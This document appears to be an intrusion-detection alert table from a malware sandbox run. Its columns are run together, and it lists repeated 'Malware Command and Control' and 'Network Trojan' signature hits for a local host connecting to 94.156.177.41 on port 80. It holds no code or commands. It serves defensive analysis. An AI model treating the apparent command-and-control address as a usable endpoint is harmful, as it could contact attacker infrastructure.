                    2025-01-07T12:33:44.073014+010020253811Malware Command and Control Activity Detected192.168.2.45012194.156.177.4180TCP
                    2025-01-07T12:33:44.978438+010020253811Malware Command and Control Activity Detected192.168.2.45012294.156.177.4180TCP
                    2025-01-07T12:33:45.848723+010020253811Malware Command and Control Activity Detected192.168.2.45012394.156.177.4180TCP
                    2025-01-07T12:33:46.736292+010020253811Malware Command and Control Activity Detected192.168.2.45012494.156.177.4180TCP
                    2025-01-07T12:33:47.784973+010020253811Malware Command and Control Activity Detected192.168.2.45012594.156.177.4180TCP
                    2025-01-07T12:33:48.642095+010020253811Malware Command and Control Activity Detected192.168.2.45012694.156.177.4180TCP
                    2025-01-07T12:33:49.553437+010020253811Malware Command and Control Activity Detected192.168.2.45012794.156.177.4180TCP
                    2025-01-07T12:33:50.465759+010020253811Malware Command and Control Activity Detected192.168.2.45012894.156.177.4180TCP
                    2025-01-07T12:33:51.347194+010020253811Malware Command and Control Activity Detected192.168.2.45012994.156.177.4180TCP
                    2025-01-07T12:33:52.222675+010020253811Malware Command and Control Activity Detected192.168.2.45013094.156.177.4180TCP
                    2025-01-07T12:33:53.621252+010020253811Malware Command and Control Activity Detected192.168.2.45013194.156.177.4180TCP
                    2025-01-07T12:33:54.519173+010020253811Malware Command and Control Activity Detected192.168.2.45013294.156.177.4180TCP
                    2025-01-07T12:33:55.412870+010020253811Malware Command and Control Activity Detected192.168.2.45013394.156.177.4180TCP
                    2025-01-07T12:33:56.462921+010020253811Malware Command and Control Activity Detected192.168.2.45013494.156.177.4180TCP
                    2025-01-07T12:33:57.340598+010020253811Malware Command and Control Activity Detected192.168.2.45013594.156.177.4180TCP
                    2025-01-07T12:33:58.239632+010020253811Malware Command and Control Activity Detected192.168.2.45013694.156.177.4180TCP
                    2025-01-07T12:33:59.128389+010020253811Malware Command and Control Activity Detected192.168.2.45013794.156.177.4180TCP
                    2025-01-07T12:33:59.979403+010020253811Malware Command and Control Activity Detected192.168.2.45013894.156.177.4180TCP
                    2025-01-07T12:34:01.024157+010020253811Malware Command and Control Activity Detected192.168.2.45013994.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:31:59.242781+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450139TCP
                    2025-01-07T12:32:03.316472+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449739TCP
                    2025-01-07T12:32:04.346344+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449740TCP
                    2025-01-07T12:32:05.262504+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449741TCP
                    2025-01-07T12:32:07.009649+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449742TCP
                    2025-01-07T12:32:07.939892+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449743TCP
                    2025-01-07T12:32:08.824777+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449744TCP
                    2025-01-07T12:32:09.737549+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449745TCP
                    2025-01-07T12:32:10.807324+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449746TCP
                    2025-01-07T12:32:11.922696+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449747TCP
                    2025-01-07T12:32:12.858606+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449749TCP
                    2025-01-07T12:32:13.761638+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449751TCP
                    2025-01-07T12:32:14.651917+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449754TCP
                    2025-01-07T12:32:15.599338+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449756TCP
                    2025-01-07T12:32:16.538409+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449758TCP
                    2025-01-07T12:32:17.450376+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449759TCP
                    2025-01-07T12:32:18.370632+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449760TCP
                    2025-01-07T12:32:19.260027+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449761TCP
                    2025-01-07T12:32:20.166304+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449762TCP
                    2025-01-07T12:32:21.060111+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449763TCP
                    2025-01-07T12:32:21.999489+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449764TCP
                    2025-01-07T12:32:22.924878+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449765TCP
                    2025-01-07T12:32:23.824756+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449766TCP
                    2025-01-07T12:32:24.703088+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449767TCP
                    2025-01-07T12:32:25.629186+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449768TCP
                    2025-01-07T12:32:26.582437+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449769TCP
                    2025-01-07T12:32:27.435344+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449770TCP
                    2025-01-07T12:32:28.347249+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449771TCP
                    2025-01-07T12:32:29.354116+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449772TCP
                    2025-01-07T12:32:30.226727+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449773TCP
                    2025-01-07T12:32:31.100067+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449774TCP
                    2025-01-07T12:32:31.994435+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449775TCP
                    2025-01-07T12:32:32.896298+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449776TCP
                    2025-01-07T12:32:33.776885+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449777TCP
                    2025-01-07T12:32:34.670302+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449778TCP
                    2025-01-07T12:32:35.562339+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449779TCP
                    2025-01-07T12:32:36.439728+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449780TCP
                    2025-01-07T12:32:37.329468+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449781TCP
                    2025-01-07T12:32:38.197506+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449782TCP
                    2025-01-07T12:32:39.109271+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449783TCP
                    2025-01-07T12:32:39.962119+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449784TCP
                    2025-01-07T12:32:40.845506+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449785TCP
                    2025-01-07T12:32:41.710383+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449786TCP
                    2025-01-07T12:32:42.595767+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449787TCP
                    2025-01-07T12:32:43.485712+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449788TCP
                    2025-01-07T12:32:44.373199+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449789TCP
                    2025-01-07T12:32:45.265357+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449790TCP
                    2025-01-07T12:32:46.125040+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449791TCP
                    2025-01-07T12:32:47.031149+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449792TCP
                    2025-01-07T12:32:47.919801+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449793TCP
                    2025-01-07T12:32:48.826184+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449794TCP
                    2025-01-07T12:32:49.717963+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449795TCP
                    2025-01-07T12:32:50.614088+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449796TCP
                    2025-01-07T12:32:51.499943+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449798TCP
                    2025-01-07T12:32:52.427147+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449799TCP
                    2025-01-07T12:32:53.328635+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449800TCP
                    2025-01-07T12:32:54.431309+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449801TCP
                    2025-01-07T12:32:55.301802+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449803TCP
                    2025-01-07T12:32:56.189746+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449804TCP
                    2025-01-07T12:32:57.078314+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449810TCP
                    2025-01-07T12:32:57.967104+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449816TCP
                    2025-01-07T12:32:58.858821+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449822TCP
                    2025-01-07T12:32:59.725632+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449828TCP
                    2025-01-07T12:33:00.612312+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449837TCP
                    2025-01-07T12:33:01.502409+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449843TCP
                    2025-01-07T12:33:02.400864+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449849TCP
                    2025-01-07T12:33:03.290840+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449857TCP
                    2025-01-07T12:33:04.233933+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449863TCP
                    2025-01-07T12:33:05.139877+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449869TCP
                    2025-01-07T12:33:06.016218+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449875TCP
                    2025-01-07T12:33:06.899543+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449882TCP
                    2025-01-07T12:33:07.927128+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449888TCP
                    2025-01-07T12:33:08.813925+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449898TCP
                    2025-01-07T12:33:09.729144+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449904TCP
                    2025-01-07T12:33:10.776074+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449910TCP
                    2025-01-07T12:33:11.664061+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449918TCP
                    2025-01-07T12:33:12.599063+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449927TCP
                    2025-01-07T12:33:13.822457+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449933TCP
                    2025-01-07T12:33:14.703463+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449941TCP
                    2025-01-07T12:33:15.589754+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449950TCP
                    2025-01-07T12:33:16.534583+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449956TCP
                    2025-01-07T12:33:17.420281+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449962TCP
                    2025-01-07T12:33:18.323422+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449968TCP
                    2025-01-07T12:33:19.388466+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449974TCP
                    2025-01-07T12:33:20.267460+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449985TCP
                    2025-01-07T12:33:21.183793+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449991TCP
                    2025-01-07T12:33:22.102226+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449997TCP
                    2025-01-07T12:33:22.993264+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450003TCP
                    2025-01-07T12:33:23.910512+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450010TCP
                    2025-01-07T12:33:24.790680+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450019TCP
                    2025-01-07T12:33:25.731038+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450026TCP
                    2025-01-07T12:33:26.615954+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450032TCP
                    2025-01-07T12:33:27.509460+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450038TCP
                    2025-01-07T12:33:28.411500+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450045TCP
                    2025-01-07T12:33:29.326539+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450054TCP
                    2025-01-07T12:33:30.205109+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450060TCP
                    2025-01-07T12:33:31.138590+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450067TCP
                    2025-01-07T12:33:32.026118+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450073TCP
                    2025-01-07T12:33:32.925198+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450079TCP
                    2025-01-07T12:33:33.842894+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450086TCP
                    2025-01-07T12:33:34.755137+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450094TCP
                    2025-01-07T12:33:35.668143+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450100TCP
                    2025-01-07T12:33:36.547440+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450106TCP
                    2025-01-07T12:33:37.467122+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450112TCP
                    2025-01-07T12:33:38.356590+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450114TCP
                    2025-01-07T12:33:39.284335+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450115TCP
                    2025-01-07T12:33:40.154005+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450116TCP
                    2025-01-07T12:33:41.031213+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450117TCP
                    2025-01-07T12:33:42.073941+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450118TCP
                    2025-01-07T12:33:42.948672+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450119TCP
                    2025-01-07T12:33:43.915043+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450120TCP
                    2025-01-07T12:33:44.826511+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450121TCP
                    2025-01-07T12:33:45.698774+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450122TCP
                    2025-01-07T12:33:46.590607+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450123TCP
                    2025-01-07T12:33:47.646236+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450124TCP
                    2025-01-07T12:33:48.501354+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450125TCP
                    2025-01-07T12:33:49.405760+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450126TCP
                    2025-01-07T12:33:50.313200+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450127TCP
                    2025-01-07T12:33:51.196923+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450128TCP
                    2025-01-07T12:33:52.082481+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450129TCP
                    2025-01-07T12:33:53.261119+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450130TCP
                    2025-01-07T12:33:54.365193+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450131TCP
                    2025-01-07T12:33:55.268000+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450132TCP
                    2025-01-07T12:33:56.172324+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450133TCP
                    2025-01-07T12:33:57.179973+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450134TCP
                    2025-01-07T12:33:58.093795+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450135TCP
                    2025-01-07T12:33:58.984297+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450136TCP
                    2025-01-07T12:33:59.837375+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450137TCP
                    2025-01-07T12:34:00.727211+010020254831A Network Trojan was detected94.156.177.4180192.168.2.450138TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-07T12:32:03.275190+010020243131Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                    2025-01-07T12:32:04.338995+010020243131Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                    2025-01-07T12:32:05.248744+010020243131Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                    2025-01-07T12:32:07.009365+010020243131Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
                    2025-01-07T12:32:07.935086+010020243131Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                    2025-01-07T12:32:08.818254+010020243131Malware Command and Control Activity Detected192.168.2.44974494.156.177.4180TCP
                    2025-01-07T12:32:09.731700+010020243131Malware Command and Control Activity Detected192.168.2.44974594.156.177.4180TCP
                    2025-01-07T12:32:10.797050+010020243131Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                    2025-01-07T12:32:11.917927+010020243131Malware Command and Control Activity Detected192.168.2.44974794.156.177.4180TCP
                    2025-01-07T12:32:12.853819+010020243131Malware Command and Control Activity Detected192.168.2.44974994.156.177.4180TCP
                    2025-01-07T12:32:13.756413+010020243131Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
                    2025-01-07T12:32:14.647155+010020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                    2025-01-07T12:32:15.593522+010020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                    2025-01-07T12:32:16.533683+010020243131Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
                    2025-01-07T12:32:17.445085+010020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                    2025-01-07T12:32:18.365851+010020243131Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
                    2025-01-07T12:32:19.255213+010020243131Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                    2025-01-07T12:32:20.161554+010020243131Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                    2025-01-07T12:32:21.055285+010020243131Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
                    2025-01-07T12:32:21.994686+010020243131Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                    2025-01-07T12:32:22.907710+010020243131Malware Command and Control Activity Detected192.168.2.44976594.156.177.4180TCP
                    2025-01-07T12:32:23.819944+010020243131Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                    2025-01-07T12:32:24.698249+010020243131Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                    2025-01-07T12:32:25.606968+010020243131Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                    2025-01-07T12:32:26.577641+010020243131Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                    2025-01-07T12:32:27.430547+010020243131Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                    2025-01-07T12:32:28.316402+010020243131Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                    2025-01-07T12:32:29.349357+010020243131Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                    2025-01-07T12:32:30.221935+010020243131Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                    2025-01-07T12:32:31.091089+010020243131Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                    2025-01-07T12:32:31.988683+010020243131Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                    2025-01-07T12:32:32.891493+010020243131Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                    2025-01-07T12:32:33.772124+010020243131Malware Command and Control Activity Detected192.168.2.44977794.156.177.4180TCP
                    2025-01-07T12:32:34.665544+010020243131Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                    2025-01-07T12:32:35.557501+010020243131Malware Command and Control Activity Detected192.168.2.44977994.156.177.4180TCP
                    2025-01-07T12:32:36.434903+010020243131Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                    2025-01-07T12:32:37.324672+010020243131Malware Command and Control Activity Detected192.168.2.44978194.156.177.4180TCP
                    2025-01-07T12:32:38.192729+010020243131Malware Command and Control Activity Detected192.168.2.44978294.156.177.4180TCP
                    2025-01-07T12:32:39.104383+010020243131Malware Command and Control Activity Detected192.168.2.44978394.156.177.4180TCP
                    2025-01-07T12:32:39.957327+010020243131Malware Command and Control Activity Detected192.168.2.44978494.156.177.4180TCP
                    2025-01-07T12:32:40.840674+010020243131Malware Command and Control Activity Detected192.168.2.44978594.156.177.4180TCP
                    2025-01-07T12:32:41.705575+010020243131Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                    2025-01-07T12:32:42.591000+010020243131Malware Command and Control Activity Detected192.168.2.44978794.156.177.4180TCP
                    2025-01-07T12:32:43.480919+010020243131Malware Command and Control Activity Detected192.168.2.44978894.156.177.4180TCP
                    2025-01-07T12:32:44.368376+010020243131Malware Command and Control Activity Detected192.168.2.44978994.156.177.4180TCP
                    2025-01-07T12:32:45.260532+010020243131Malware Command and Control Activity Detected192.168.2.44979094.156.177.4180TCP
                    2025-01-07T12:32:46.120173+010020243131Malware Command and Control Activity Detected192.168.2.44979194.156.177.4180TCP
                    2025-01-07T12:32:47.026386+010020243131Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                    2025-01-07T12:32:47.914990+010020243131Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                    2025-01-07T12:32:48.821374+010020243131Malware Command and Control Activity Detected192.168.2.44979494.156.177.4180TCP
                    2025-01-07T12:32:49.713193+010020243131Malware Command and Control Activity Detected192.168.2.44979594.156.177.4180TCP
                    2025-01-07T12:32:50.609302+010020243131Malware Command and Control Activity Detected192.168.2.44979694.156.177.4180TCP
                    2025-01-07T12:32:51.495138+010020243131Malware Command and Control Activity Detected192.168.2.44979894.156.177.4180TCP
                    2025-01-07T12:32:52.422354+010020243131Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                    2025-01-07T12:32:53.323679+010020243131Malware Command and Control Activity Detected192.168.2.44980094.156.177.4180TCP
                    2025-01-07T12:32:54.426552+010020243131Malware Command and Control Activity Detected192.168.2.44980194.156.177.4180TCP
                    2025-01-07T12:32:55.294818+010020243131Malware Command and Control Activity Detected192.168.2.44980394.156.177.4180TCP
                    2025-01-07T12:32:56.184948+010020243131Malware Command and Control Activity Detected192.168.2.44980494.156.177.4180TCP
                    2025-01-07T12:32:57.071831+010020243131Malware Command and Control Activity Detected192.168.2.44981094.156.177.4180TCP
                    2025-01-07T12:32:57.962291+010020243131Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                    2025-01-07T12:32:58.853828+010020243131Malware Command and Control Activity Detected192.168.2.44982294.156.177.4180TCP
                    2025-01-07T12:32:59.720354+010020243131Malware Command and Control Activity Detected192.168.2.44982894.156.177.4180TCP
                    2025-01-07T12:33:00.607397+010020243131Malware Command and Control Activity Detected192.168.2.44983794.156.177.4180TCP
                    2025-01-07T12:33:01.490314+010020243131Malware Command and Control Activity Detected192.168.2.44984394.156.177.4180TCP
                    2025-01-07T12:33:02.396007+010020243131Malware Command and Control Activity Detected192.168.2.44984994.156.177.4180TCP
                    2025-01-07T12:33:03.285971+010020243131Malware Command and Control Activity Detected192.168.2.44985794.156.177.4180TCP
                    2025-01-07T12:33:04.228379+010020243131Malware Command and Control Activity Detected192.168.2.44986394.156.177.4180TCP
                    2025-01-07T12:33:05.135088+010020243131Malware Command and Control Activity Detected192.168.2.44986994.156.177.4180TCP
                    2025-01-07T12:33:06.011427+010020243131Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                    2025-01-07T12:33:06.894211+010020243131Malware Command and Control Activity Detected192.168.2.44988294.156.177.4180TCP
                    2025-01-07T12:33:07.922188+010020243131Malware Command and Control Activity Detected192.168.2.44988894.156.177.4180TCP
                    2025-01-07T12:33:08.808854+010020243131Malware Command and Control Activity Detected192.168.2.44989894.156.177.4180TCP
                    2025-01-07T12:33:09.719346+010020243131Malware Command and Control Activity Detected192.168.2.44990494.156.177.4180TCP
                    2025-01-07T12:33:10.771269+010020243131Malware Command and Control Activity Detected192.168.2.44991094.156.177.4180TCP
                    2025-01-07T12:33:11.659311+010020243131Malware Command and Control Activity Detected192.168.2.44991894.156.177.4180TCP
                    2025-01-07T12:33:12.593371+010020243131Malware Command and Control Activity Detected192.168.2.44992794.156.177.4180TCP
                    2025-01-07T12:33:13.817700+010020243131Malware Command and Control Activity Detected192.168.2.44993394.156.177.4180TCP
                    2025-01-07T12:33:14.698696+010020243131Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                    2025-01-07T12:33:15.583031+010020243131Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                    2025-01-07T12:33:16.529723+010020243131Malware Command and Control Activity Detected192.168.2.44995694.156.177.4180TCP
                    2025-01-07T12:33:17.415506+010020243131Malware Command and Control Activity Detected192.168.2.44996294.156.177.4180TCP
                    2025-01-07T12:33:18.317821+010020243131Malware Command and Control Activity Detected192.168.2.44996894.156.177.4180TCP
                    2025-01-07T12:33:19.383367+010020243131Malware Command and Control Activity Detected192.168.2.44997494.156.177.4180TCP
                    2025-01-07T12:33:20.262019+010020243131Malware Command and Control Activity Detected192.168.2.44998594.156.177.4180TCP
                    2025-01-07T12:33:21.160919+010020243131Malware Command and Control Activity Detected192.168.2.44999194.156.177.4180TCP
                    2025-01-07T12:33:22.097407+010020243131Malware Command and Control Activity Detected192.168.2.44999794.156.177.4180TCP
                    2025-01-07T12:33:22.988429+010020243131Malware Command and Control Activity Detected192.168.2.45000394.156.177.4180TCP
                    2025-01-07T12:33:23.905645+010020243131Malware Command and Control Activity Detected192.168.2.45001094.156.177.4180TCP
                    2025-01-07T12:33:24.785850+010020243131Malware Command and Control Activity Detected192.168.2.45001994.156.177.4180TCP
                    2025-01-07T12:33:25.726265+010020243131Malware Command and Control Activity Detected192.168.2.45002694.156.177.4180TCP
                    2025-01-07T12:33:26.611215+010020243131Malware Command and Control Activity Detected192.168.2.45003294.156.177.4180TCP
                    2025-01-07T12:33:27.495067+010020243131Malware Command and Control Activity Detected192.168.2.45003894.156.177.4180TCP
                    2025-01-07T12:33:28.406726+010020243131Malware Command and Control Activity Detected192.168.2.45004594.156.177.4180TCP
                    2025-01-07T12:33:29.321667+010020243131Malware Command and Control Activity Detected192.168.2.45005494.156.177.4180TCP
                    2025-01-07T12:33:30.200229+010020243131Malware Command and Control Activity Detected192.168.2.45006094.156.177.4180TCP
                    2025-01-07T12:33:31.133820+010020243131Malware Command and Control Activity Detected192.168.2.45006794.156.177.4180TCP
                    2025-01-07T12:33:32.021373+010020243131Malware Command and Control Activity Detected192.168.2.45007394.156.177.4180TCP
                    2025-01-07T12:33:32.920405+010020243131Malware Command and Control Activity Detected192.168.2.45007994.156.177.4180TCP
                    2025-01-07T12:33:33.838131+010020243131Malware Command and Control Activity Detected192.168.2.45008694.156.177.4180TCP
                    2025-01-07T12:33:34.750375+010020243131Malware Command and Control Activity Detected192.168.2.45009494.156.177.4180TCP
                    2025-01-07T12:33:35.663277+010020243131Malware Command and Control Activity Detected192.168.2.45010094.156.177.4180TCP
                    2025-01-07T12:33:36.542571+010020243131Malware Command and Control Activity Detected192.168.2.45010694.156.177.4180TCP
                    2025-01-07T12:33:37.462301+010020243131Malware Command and Control Activity Detected192.168.2.45011294.156.177.4180TCP
                    2025-01-07T12:33:38.351026+010020243131Malware Command and Control Activity Detected192.168.2.45011494.156.177.4180TCP
                    2025-01-07T12:33:39.277673+010020243131Malware Command and Control Activity Detected192.168.2.45011594.156.177.4180TCP
                    2025-01-07T12:33:40.149202+010020243131Malware Command and Control Activity Detected192.168.2.45011694.156.177.4180TCP
                    2025-01-07T12:33:41.026481+010020243131Malware Command and Control Activity Detected192.168.2.45011794.156.177.4180TCP
                    2025-01-07T12:33:42.069136+010020243131Malware Command and Control Activity Detected192.168.2.45011894.156.177.4180TCP
                    2025-01-07T12:33:42.943866+010020243131Malware Command and Control Activity Detected192.168.2.45011994.156.177.4180TCP
                    2025-01-07T12:33:43.909799+010020243131Malware Command and Control Activity Detected192.168.2.45012094.156.177.4180TCP
                    2025-01-07T12:33:44.821678+010020243131Malware Command and Control Activity Detected192.168.2.45012194.156.177.4180TCP
                    2025-01-07T12:33:45.694009+010020243131Malware Command and Control Activity Detected192.168.2.45012294.156.177.4180TCP
                    2025-01-07T12:33:46.585711+010020243131Malware Command and Control Activity Detected192.168.2.45012394.156.177.4180TCP
                    2025-01-07T12:33:47.641378+010020243131Malware Command and Control Activity Detected192.168.2.45012494.156.177.4180TCP
                    2025-01-07T12:33:48.495517+010020243131Malware Command and Control Activity Detected192.168.2.45012594.156.177.4180TCP
                    2025-01-07T12:33:49.400961+010020243131Malware Command and Control Activity Detected192.168.2.45012694.156.177.4180TCP
                    2025-01-07T12:33:50.308279+010020243131Malware Command and Control Activity Detected192.168.2.45012794.156.177.4180TCP
                    2025-01-07T12:33:51.192040+010020243131Malware Command and Control Activity Detected192.168.2.45012894.156.177.4180TCP
                    2025-01-07T12:33:52.077623+010020243131Malware Command and Control Activity Detected192.168.2.45012994.156.177.4180TCP
                    2025-01-07T12:33:53.256311+010020243131Malware Command and Control Activity Detected192.168.2.45013094.156.177.4180TCP
                    2025-01-07T12:33:54.360403+010020243131Malware Command and Control Activity Detected192.168.2.45013194.156.177.4180TCP
                    2025-01-07T12:33:55.263205+010020243131Malware Command and Control Activity Detected192.168.2.45013294.156.177.4180TCP
                    2025-01-07T12:33:56.154405+010020243131Malware Command and Control Activity Detected192.168.2.45013394.156.177.4180TCP
                    2025-01-07T12:33:57.175145+010020243131Malware Command and Control Activity Detected192.168.2.45013494.156.177.4180TCP
                    2025-01-07T12:33:58.088991+010020243131Malware Command and Control Activity Detected192.168.2.45013594.156.177.4180TCP
                    2025-01-07T12:33:58.979379+010020243131Malware Command and Control Activity Detected192.168.2.45013694.156.177.4180TCP
                    2025-01-07T12:33:59.832529+010020243131Malware Command and Control Activity Detected192.168.2.45013794.156.177.4180TCP
